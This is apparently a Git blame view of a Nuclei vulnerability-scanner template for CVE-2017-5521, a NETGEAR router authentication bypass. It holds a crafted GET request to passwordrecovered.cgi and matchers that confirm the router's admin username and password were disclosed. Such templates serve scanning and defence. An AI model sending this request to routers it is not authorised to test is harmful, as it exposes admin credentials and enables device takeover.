daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2017/CVE-2017-5521.yaml

28 lines
974 B
YAML
Raw Normal View History

Create CVE-2017-5521.yaml
2021-04-13 19:54:49 +00:00
id: CVE-2017-5521
info:
name: Bypassing Authentication on NETGEAR Routers
author: princechaddha
severity: medium
description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server.
reference: |
- https://www.cvedetails.com/cve/CVE-2017-5521/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
tags: cve,cve2017,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"
matchers-condition: and
matchers:
- type: word
words:
- "right\">Router\\s*Admin\\s*Username<"
- "right\">Router\\s*Admin\\s*Password<"
condition: and
Update CVE-2017-5521.yaml
2021-04-13 20:03:05 +00:00
part: body
Create CVE-2017-5521.yaml
2021-04-13 19:54:49 +00:00
- type: status
status:
- 200